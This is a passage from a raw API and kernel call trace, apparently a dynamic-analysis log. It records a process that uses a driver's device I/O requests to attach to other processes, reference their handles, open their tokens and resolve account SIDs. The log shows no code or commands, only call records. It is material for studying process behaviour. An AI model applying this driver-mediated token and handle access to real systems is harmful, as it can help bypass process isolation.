ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.646] ObfDereferenceObject (Object=0xffffe0006a2b8dd0) returned 0x800e [0290.647] IoCompleteRequest () returned 0x0 [0290.647] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.647] PsAcquireProcessExitSynchronization () returned 0x0 [0290.647] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.654] ObReferenceObjectByHandle (in: Handle=0xb0c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a007d00, HandleInformation=0x0) returned 0x0 [0290.654] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.654] PsReleaseProcessExitSynchronization () returned 0x2 [0290.654] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58079 [0290.654] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.654] ObfDereferenceObject (Object=0xffffe0006a007d00) returned 0x8003 [0290.654] IoCompleteRequest () returned 0x0 [0290.654] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.654] PsAcquireProcessExitSynchronization () returned 0x0 [0290.654] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.658] ObReferenceObjectByHandle (in: Handle=0xb78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2c1ad0, HandleInformation=0x0) returned 0x0 [0290.658] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.658] PsReleaseProcessExitSynchronization () returned 0x2 [0290.658] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58078 [0290.658] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.658] ObfDereferenceObject (Object=0xffffe0006a2c1ad0) returned 0x8003 [0290.658] IoCompleteRequest () returned 0x0 [0290.658] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.658] PsAcquireProcessExitSynchronization () returned 0x0 [0290.658] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.745] ObReferenceObjectByHandle (in: Handle=0xb80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2c13a0, HandleInformation=0x0) returned 0x0 [0290.745] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.745] PsReleaseProcessExitSynchronization () returned 0x2 [0290.745] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58077 [0290.745] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.745] ObfDereferenceObject (Object=0xffffe0006a2c13a0) returned 0x8003 [0290.745] IoCompleteRequest () returned 0x0 [0290.745] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.745] PsAcquireProcessExitSynchronization () returned 0x0 [0290.745] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.861] ObReferenceObjectByHandle (in: Handle=0xb88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2bcbf0, HandleInformation=0x0) returned 0x0 [0290.861] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.861] PsReleaseProcessExitSynchronization () returned 0x2 [0290.861] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58076 [0290.861] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.861] ObfDereferenceObject (Object=0xffffe0006a2bcbf0) returned 0x8003 [0290.861] IoCompleteRequest () returned 0x0 [0290.861] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.861] PsAcquireProcessExitSynchronization () returned 0x0 [0290.861] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.931] ObReferenceObjectByHandle (in: Handle=0xb90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2be790, HandleInformation=0x0) returned 0x0 [0290.931] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.931] PsReleaseProcessExitSynchronization () returned 0x2 [0290.931] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58075 [0290.931] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068acd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068acd7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.931] ObfDereferenceObject (Object=0xffffe0006a2be790) returned 0x8003 [0290.931] IoCompleteRequest () returned 0x0 [0290.931] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.931] PsAcquireProcessExitSynchronization () returned 0x0 [0290.931] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.953] ObReferenceObjectByHandle (in: Handle=0xb98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2c04e0, HandleInformation=0x0) returned 0x0 [0290.954] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.954] PsReleaseProcessExitSynchronization () returned 0x2 [0290.954] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58074 [0290.954] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.954] ObfDereferenceObject (Object=0xffffe0006a2c04e0) returned 0x8003 [0290.954] IoCompleteRequest () returned 0x0 [0290.954] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.954] PsAcquireProcessExitSynchronization () returned 0x0 [0290.954] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.956] ObReferenceObjectByHandle (in: Handle=0xba0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2c1db0, HandleInformation=0x0) returned 0x0 [0290.956] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.956] PsReleaseProcessExitSynchronization () returned 0x2 [0290.956] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58073 [0290.956] ObQueryNameString (in: Object=0xffffe0006a2c1db0, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.956] ObfDereferenceObject (Object=0xffffe0006a2c1db0) returned 0x800e [0290.956] IoCompleteRequest () returned 0x0 [0290.956] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.956] PsAcquireProcessExitSynchronization () returned 0x0 [0290.956] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0291.226] ObReferenceObjectByHandle (in: Handle=0xc18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2dd960, HandleInformation=0x0) returned 0x0 [0291.226] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.226] PsReleaseProcessExitSynchronization () returned 0x2 [0291.226] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58072 [0291.226] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.226] ObfDereferenceObject (Object=0xffffe0006a2dd960) returned 0x8003 [0291.226] IoCompleteRequest () returned 0x0 [0291.226] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.226] PsAcquireProcessExitSynchronization () returned 0x0 [0291.226] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0291.268] ObReferenceObjectByHandle (in: Handle=0xc1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2df9c0, HandleInformation=0x0) returned 0x0 [0291.268] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.268] PsReleaseProcessExitSynchronization () returned 0x2 [0291.268] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58071 [0291.268] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.268] ObfDereferenceObject (Object=0xffffe0006a2df9c0) returned 0x8003 [0291.268] IoCompleteRequest () returned 0x0 [0291.268] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.268] PsAcquireProcessExitSynchronization () returned 0x0 [0291.268] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0291.273] ObReferenceObjectByHandle (in: Handle=0xc34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2dadb0, HandleInformation=0x0) returned 0x0 [0291.273] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.273] PsReleaseProcessExitSynchronization () returned 0x2 [0291.273] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58070 [0291.273] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.273] ObfDereferenceObject (Object=0xffffe0006a2dadb0) returned 0x7fff [0291.273] IoCompleteRequest () returned 0x0 [0291.273] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.273] PsAcquireProcessExitSynchronization () returned 0x0 [0291.273] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0291.372] ObReferenceObjectByHandle (in: Handle=0xc44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2dbdb0, HandleInformation=0x0) returned 0x0 [0291.372] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.372] PsReleaseProcessExitSynchronization () returned 0x2 [0291.372] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5806f [0291.372] ObQueryNameString (in: Object=0xffffe0006a2dbdb0, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.372] ObfDereferenceObject (Object=0xffffe0006a2dbdb0) returned 0x7ffe [0291.372] IoCompleteRequest () returned 0x0 [0291.373] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.373] PsAcquireProcessExitSynchronization () returned 0x0 [0291.373] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0291.641] ObReferenceObjectByHandle (in: Handle=0xec8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2e6540, HandleInformation=0x0) returned 0x0 [0291.641] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.641] PsReleaseProcessExitSynchronization () returned 0x2 [0291.641] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5806e [0291.641] ObQueryNameString (in: Object=0xffffe0006a2e6540, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.641] ObfDereferenceObject (Object=0xffffe0006a2e6540) returned 0x7ffe [0291.641] IoCompleteRequest () returned 0x0 [0291.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1fc) returned 0x188 [0291.641] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.641] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a06c840, HandleInformation=0x0) returned 0x0 [0291.641] ObOpenObjectByPointer (in: Object=0xffffe0006a06c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.641] ObfDereferenceObject (Object=0xffffe0006a06c840) returned 0x2fff2 [0291.641] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.641] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.641] IoCompleteRequest () returned 0x0 [0291.641] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.641] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.642] CloseHandle (hObject=0x18c) returned 1 [0291.642] CloseHandle (hObject=0x188) returned 1 [0291.642] PsLookupProcessByProcessId (in: ProcessId=0x1fc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.642] PsAcquireProcessExitSynchronization () returned 0x0 [0291.642] KeStackAttachProcess (in: PROCESS=0xffffe0006a06c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06c840, ApcState=0xffffd000ac0cf400) [0291.642] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690615d0, HandleInformation=0x0) returned 0x0 [0291.642] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.643] PsReleaseProcessExitSynchronization () returned 0x2 [0291.643] ObfDereferenceObject (Object=0xffffe0006a06c840) returned 0x27ff0 [0291.643] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.643] ObfDereferenceObject (Object=0xffffe000690615d0) returned 0x7ffe [0291.643] IoCompleteRequest () returned 0x0 [0291.643] PsLookupProcessByProcessId (in: ProcessId=0x1fc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.643] PsAcquireProcessExitSynchronization () returned 0x0 [0291.643] KeStackAttachProcess (in: PROCESS=0xffffe0006a06c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06c840, ApcState=0xffffd000ac0cf400) [0291.643] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00078d747b0, HandleInformation=0x0) returned 0x0 [0291.643] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.643] PsReleaseProcessExitSynchronization () returned 0x2 [0291.643] ObfDereferenceObject (Object=0xffffe0006a06c840) returned 0x27fef [0291.643] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.643] ObfDereferenceObject (Object=0xffffe00078d747b0) returned 0x7ffe [0291.643] IoCompleteRequest () returned 0x0 [0291.643] PsLookupProcessByProcessId (in: ProcessId=0x1fc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.643] PsAcquireProcessExitSynchronization () returned 0x0 [0291.643] KeStackAttachProcess (in: PROCESS=0xffffe0006a06c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06c840, ApcState=0xffffd000ac0cf400) [0291.643] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069113350, HandleInformation=0x0) returned 0x0 [0291.643] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.643] PsReleaseProcessExitSynchronization () returned 0x2 [0291.643] ObfDereferenceObject (Object=0xffffe0006a06c840) returned 0x27fee [0291.643] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.643] ObfDereferenceObject (Object=0xffffe00069113350) returned 0x7ffe [0291.643] IoCompleteRequest () returned 0x0 [0291.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x328) returned 0x188 [0291.643] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.643] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006934d080, HandleInformation=0x0) returned 0x0 [0291.643] ObOpenObjectByPointer (in: Object=0xffffe0006934d080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.643] ObfDereferenceObject (Object=0xffffe0006934d080) returned 0x2fff2 [0291.643] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.643] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.643] IoCompleteRequest () returned 0x0 [0291.643] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.643] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.644] CloseHandle (hObject=0x18c) returned 1 [0291.644] CloseHandle (hObject=0x188) returned 1 [0291.644] PsLookupProcessByProcessId (in: ProcessId=0x328, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.644] PsAcquireProcessExitSynchronization () returned 0x0 [0291.644] KeStackAttachProcess (in: PROCESS=0xffffe0006934d080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006934d080, ApcState=0xffffd000ac0cf400) [0291.644] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069112370, HandleInformation=0x0) returned 0x0 [0291.644] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.644] PsReleaseProcessExitSynchronization () returned 0x2 [0291.644] ObfDereferenceObject (Object=0xffffe0006934d080) returned 0x27ff0 [0291.644] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.644] ObfDereferenceObject (Object=0xffffe00069112370) returned 0x7ffe [0291.644] IoCompleteRequest () returned 0x0 [0291.645] PsLookupProcessByProcessId (in: ProcessId=0x328, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.645] PsAcquireProcessExitSynchronization () returned 0x0 [0291.645] KeStackAttachProcess (in: PROCESS=0xffffe0006934d080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006934d080, ApcState=0xffffd000ac0cf400) [0291.645] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a51650, HandleInformation=0x0) returned 0x0 [0291.645] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.645] PsReleaseProcessExitSynchronization () returned 0x2 [0291.645] ObfDereferenceObject (Object=0xffffe0006934d080) returned 0x27fef [0291.645] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.645] ObfDereferenceObject (Object=0xffffe00069a51650) returned 0x7ffe [0291.645] IoCompleteRequest () returned 0x0 [0291.645] PsLookupProcessByProcessId (in: ProcessId=0x328, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.645] PsAcquireProcessExitSynchronization () returned 0x0 [0291.645] KeStackAttachProcess (in: PROCESS=0xffffe0006934d080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006934d080, ApcState=0xffffd000ac0cf400) [0291.645] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690b9f20, HandleInformation=0x0) returned 0x0 [0291.645] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.645] PsReleaseProcessExitSynchronization () returned 0x2 [0291.645] ObfDereferenceObject (Object=0xffffe0006934d080) returned 0x27fee [0291.645] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.645] ObfDereferenceObject (Object=0xffffe000690b9f20) returned 0x7ffe [0291.645] IoCompleteRequest () returned 0x0 [0291.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x404) returned 0x188 [0291.645] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.645] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000693a45c0, HandleInformation=0x0) returned 0x0 [0291.645] ObOpenObjectByPointer (in: Object=0xffffe000693a45c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.645] ObfDereferenceObject (Object=0xffffe000693a45c0) returned 0x2fff2 [0291.645] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: 